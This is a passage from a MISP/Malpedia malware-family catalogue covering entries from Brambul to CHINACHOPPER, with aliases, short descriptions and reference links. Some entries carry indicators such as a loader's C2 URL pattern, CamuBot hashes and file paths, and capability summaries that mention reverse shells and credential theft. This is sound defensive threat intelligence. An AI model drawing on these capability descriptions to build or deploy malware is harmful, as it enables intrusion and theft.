Table 1525. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul
https://www.us-cert.gov/ncas/alerts/TA18-149A
https://www.secureworks.com/research/threat-profiles/nickel-academy
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/
https://www.us-cert.gov/ncas/analysis-reports/AR18-149A
https://metaswan.github.io/posts/Malware-Lazarus-group’s-Brambul-worm-of-the-former-Wannacry-1
https://metaswan.github.io/posts/Malware-Lazarus-group’s-Brambul-worm-of-the-former-Wannacry-2
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

BravoNC

The tag is: misp-galaxy:malpedia="BravoNC"

BravoNC is also known as:

Table 1526. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc
https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group

BreachRAT

This is a backdoor which FireEye call the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\Work\Breach Remote Administration Tool\Release\Client.pdb

The tag is: misp-galaxy:malpedia="BreachRAT"

BreachRAT is also known as:

Table 1527. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat
https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html

Breakthrough

There is no reference available for this family and all known samples have version 1.0.0.

Pdb-strings in the samples suggest that this is an "exclusive" loader, known as "breakthrough" (maybe), e.g. C:\Users\Exclusiv\Desktop\хп-пробив\Release\build.pdb

The communication url parameters are pretty unique in this combination: gate.php?hwid=<guid>&os=<OS>&build=1.0.0&cpu=8

<OS> is one of: Windows95 Windows98 WindowsMe Windows95family WindowsNT3 WindowsNT4 Windows2000 WindowsXP WindowsServer2003 WindowsNTfamily WindowsVista Windows7 Windows8 Windows10

The tag is: misp-galaxy:malpedia="Breakthrough"

Breakthrough is also known as:

Table 1528. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader

Bredolab

The tag is: misp-galaxy:malpedia="Bredolab"

Bredolab is also known as:

Table 1529. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab
https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/
https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html
https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf

BROLER

The tag is: misp-galaxy:malpedia="BROLER"

BROLER is also known as:

down_new

Table 1530. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.broler
https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

BrushaLoader

The tag is: misp-galaxy:malpedia="BrushaLoader"

BrushaLoader is also known as:

Table 1531. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader
https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html
https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later
https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/

BrutPOS

The tag is: misp-galaxy:malpedia="BrutPOS"

BrutPOS is also known as:

Table 1532. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos
https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html

BS2005

The tag is: misp-galaxy:malpedia="BS2005"

BS2005 is also known as:

Table 1533. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005
https://github.com/nccgroup/Royal_APT
https://www.secureworks.com/research/threat-profiles/bronze-palace
https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

BTCWare

The tag is: misp-galaxy:malpedia="BTCWare"

BTCWare is also known as:

Table 1534. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware
https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/

BUBBLEWRAP

BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.

The tag is: misp-galaxy:malpedia="BUBBLEWRAP"

BUBBLEWRAP is also known as:

Table 1535. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap
https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html
https://attack.mitre.org/software/S0043/

Buer

Buer is a downloader sold on underground forums and used by threat actors to deliver payload malware onto target machines. It has been observed in email campaigns and has been sold as a service since August 2019.

The tag is: misp-galaxy:malpedia="Buer"

Buer is also known as:

Buerloader
RustyBuer

Table 1536. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.buer
https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/
https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware
https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/
http://www.secureworks.com/research/threat-profiles/gold-symphony
https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace
https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://blog.minerva-labs.com/stopping-buerloader
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader
https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
http://www.secureworks.com/research/threat-profiles/gold-blackburn
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf
https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/
https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://blog.group-ib.com/prometheus-tds
https://twitter.com/StopMalvertisin/status/1182505434231398401
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96
https://twitter.com/SophosLabs/status/1321844306970251265

BUFFETLINE

The tag is: misp-galaxy:malpedia="BUFFETLINE"

BUFFETLINE is also known as:

Table 1537. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.buffetline
https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/
https://www.us-cert.gov/ncas/analysis-reports/ar20-045f

Buhtrap

The tag is: misp-galaxy:malpedia="Buhtrap"

Buhtrap is also known as:

Ratopak

Table 1538. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap
https://malware-research.org/carbanak-source-code-leaked/
https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack
https://www.welivesecurity.com/2015/04/09/operation-buhtrap/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/
https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/
https://www.scythe.io/library/threatthursday-buhtrap
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/
https://www.group-ib.com/brochures/gib-buhtrap-report.pdf
https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code
https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/
https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/

Bundestrojaner

The tag is: misp-galaxy:malpedia="Bundestrojaner"

Bundestrojaner is also known as:

0zapftis
R2D2

Table 1539. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner
https://www.f-secure.com/weblog/archives/00002249.html
http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf

Bunitu

Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).

The tag is: misp-galaxy:malpedia="Bunitu"

Bunitu is also known as:

Table 1540. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu
https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/
https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/
http://malware-traffic-analysis.net/2017/05/09/index.html
https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/
https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/

Buterat

The tag is: misp-galaxy:malpedia="Buterat"

Buterat is also known as:

spyvoltar

Table 1541. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat
http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html

Buzus

The tag is: misp-galaxy:malpedia="Buzus"

Buzus is also known as:

Yimfoca

Table 1542. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Yimfoca.A

BYEBY

The tag is: misp-galaxy:malpedia="BYEBY"

BYEBY is also known as:

Table 1543. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby
https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/
https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan
https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/
https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/
https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/

c0d0so0

The tag is: misp-galaxy:malpedia="c0d0so0"

c0d0so0 is also known as:

Table 1544. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0

CabArt

The tag is: misp-galaxy:malpedia="CabArt"

CabArt is also known as:

Table 1545. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart

CadelSpy

The tag is: misp-galaxy:malpedia="CadelSpy"

CadelSpy is also known as:

Cadelle

Table 1546. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy
http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf
https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

CALMTHORN

The tag is: misp-galaxy:malpedia="CALMTHORN"

CALMTHORN is also known as:

Table 1547. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn
https://www.youtube.com/watch?v=3cUWjojQXWE
https://www.datanet.co.kr/news/articleView.html?idxno=133346
https://twitter.com/8th_grey_owl/status/1357550261963689985

campoloader

The tag is: misp-galaxy:malpedia="campoloader"

campoloader is also known as:

Table 1548. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader
https://orangecyberdefense.com/global/blog/cybersoc/in-the-eye-of-our-cybersoc-campo-loader-analysis-and-detection-perspectives/
https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/
https://blog.group-ib.com/prometheus-tds
https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/
https://unit42.paloaltonetworks.com/bazarloader-malware/

CamuBot

There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :

CamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479

Dropped Files on disk :

C:\Users\user~1\AppData\Local\Temp\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1

C:\Users\user~1\AppData\Local\Temp\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8

C:\ProgramData\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190

Protecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi

A new driver is installed : C:\Windows\system32\drivers\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8

ftusbload2.sys set 28 IRP handlers.

The tag is: misp-galaxy:malpedia="CamuBot"

CamuBot is also known as:

Table 1549. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot
https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/

Cannibal Rat

Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.

The tag is: misp-galaxy:malpedia="Cannibal Rat"

Cannibal Rat is also known as:

Table 1550. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat
http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html

Cannon

The tag is: misp-galaxy:malpedia="Cannon"

Cannon is also known as:

Table 1551. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon
https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html
https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

Carbanak

The tag is: misp-galaxy:malpedia="Carbanak"

Carbanak is also known as:

Anunak

Table 1552. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak
https://threatintel.blog/OPBlueRaven-Part1/
https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/
https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html
https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe
https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/
https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.secureworks.com/research/threat-profiles/gold-niagara
https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest
https://threatintel.blog/OPBlueRaven-Part2/
https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html
https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout
https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html
https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

Carberp

The tag is: misp-galaxy:malpedia="Carberp"

Carberp is also known as:

Table 1553. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://blog.avast.com/2013/04/08/carberp_epitaph/
https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf
https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf

Cardinal RAT

Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp” which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.

The tag is: misp-galaxy:malpedia="Cardinal RAT"

Cardinal RAT is also known as:

Table 1554. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat
http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412
https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf
https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection
https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/

CARROTBALL

CARROTBALL is a simple FTP downloader built to deploy SYSCON, a Remote Access Trojan used by the same threat actor. Discovered by Unit 42 in late 2019, the downloader was adopted for use in spear phishing attacks against US government agencies.

The tag is: misp-galaxy:malpedia="CARROTBALL"

CARROTBALL is also known as:

Table 1555. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball
https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

CarrotBat

The tag is: misp-galaxy:malpedia="CarrotBat"

CarrotBat is also known as:

Table 1556. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat
https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/
https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

Casper

ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.

The tag is: misp-galaxy:malpedia="Casper"

Casper is also known as:

Table 1557. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.casper
https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/

Catchamas

The tag is: misp-galaxy:malpedia="Catchamas"

Catchamas is also known as:

Table 1558. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas
https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

CCleaner Backdoor

The tag is: misp-galaxy:malpedia="CCleaner Backdoor"

CCleaner Backdoor is also known as:

DIRTCLEANER

Table 1559. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor
https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities
https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/
http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/
https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident
http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
https://www.secureworks.com/research/threat-profiles/bronze-atlas
https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf
http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/
https://risky.biz/whatiswinnti/
https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf
https://blog.avast.com/progress-on-ccleaner-investigation
https://www.wired.com/story/ccleaner-malware-targeted-tech-firms
https://securelist.com/big-threats-using-code-similarity-part-1/97239/
https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer
https://twitter.com/craiu/status/910148928796061696
https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident
http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor
https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/
http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html

CenterPOS

The tag is: misp-galaxy:malpedia="CenterPOS"

CenterPOS is also known as:

cerebrus

Table 1560. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos
https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html

Cerber

A prolific ransomware which originally added ".cerber" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information.

The tag is: misp-galaxy:malpedia="Cerber"

Cerber is also known as:

Table 1561. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/
https://www.youtube.com/watch?v=y8Z9KnL8s8s
https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/
https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf
https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

Cerbu

This malware family delivers its artifacts packed with free and generic packers. It writes files to windows temporary folders, downloads additional malware (generally cryptominers) and deletes itself.

The tag is: misp-galaxy:malpedia="Cerbu"

Cerbu is also known as:

Table 1562. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner

Chainshot

The tag is: misp-galaxy:malpedia="Chainshot"

Chainshot is also known as:

Table 1563. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot
https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/
https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/
https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack
https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec

Chaos

In-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a "Ryuk .Net Ransomware Builder" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.

The tag is: misp-galaxy:malpedia="Chaos"

Chaos is also known as:

FakeRyuk
RyukJoke

Table 1564. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos
https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/
https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html

Chaperone

According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.

The tag is: misp-galaxy:malpedia="Chaperone"

Chaperone is also known as:

Taj Mahal

Table 1565. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone
https://securelist.com/project-tajmahal/90240/
https://github.com/TheEnergyStory/malware_analysis/tree/master/TajMahal
https://securelist.com/apt-trends-report-q2-2019/91897/

CHCH

CHCH is a Ransomware spotted in the wild in December 2019. It encrypts victim files and adds the extension .chch to them while it drops a ransomware note named: READ_ME.TXT

The tag is: misp-galaxy:malpedia="CHCH"

CHCH is also known as:

Table 1566. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chch
https://twitter.com/GrujaRS/status/1205566219971125249

ChChes

The tag is: misp-galaxy:malpedia="ChChes"

ChChes is also known as:

HAYMAKER
Ham Backdoor

Table 1567. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chches
https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/
https://www.jpcert.or.jp/magazine/acreport-ChChes.html
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
https://www.secureworks.com/research/threat-profiles/bronze-riverside
https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html

CHEESETRAY

CHEESETRAY is a sophisticated proxy-aware backdoor that can operate in both active and passive mode depending on the passed command-line parameters. The backdoor is capable of enumerating files and processes, enumerating drivers, enumerating remote desktop sessions, uploading and downloading files, creating and terminating processes, deleting files, creating a reverse shell, acting as a proxy server, and hijacking processes among its other functionality. The backdoor communicates with its C&C server using a custom binary protocol over TCP with port specified as a command-line parameter.

The tag is: misp-galaxy:malpedia="CHEESETRAY"

CHEESETRAY is also known as:

CROWDEDFLOUNDER

Table 1568. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray
https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/
https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf
https://www.us-cert.gov/ncas/analysis-reports/ar20-045c

Chernolocker

Chernolocker is a ransomware that encrypts a victim’s files by using AES-256 and it asks for BTC ransom. Different versions are classified by the attacker’s email address which changes over time.

The tag is: misp-galaxy:malpedia="Chernolocker"

Chernolocker is also known as:

Table 1569. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chernolocker
https://id-ransomware.blogspot.com/2019/12/chernolocker-ransomware.html

CherryPicker POS

The tag is: misp-galaxy:malpedia="CherryPicker POS"

CherryPicker POS is also known as:

cherry_picker
cherrypicker
cherrypickerpos

Table 1570. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker
https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/
https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/

ChewBacca

The tag is: misp-galaxy:malpedia="ChewBacca"

ChewBacca is also known as:

Table 1571. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca
http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/

CHINACHOPPER

a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.

The tag is: misp-galaxy:malpedia="CHINACHOPPER"

CHINACHOPPER is also known as:

Table 1572. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper
https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers
https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html
https://www.secureworks.com/research/threat-profiles/bronze-union
https://www.youtube.com/watch?v=rn-6t7OygGk
https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers
https://www.secureworks.com/research/threat-profiles/bronze-express
https://unit42.paloaltonetworks.com/china-chopper-webshell/
https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/
https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/
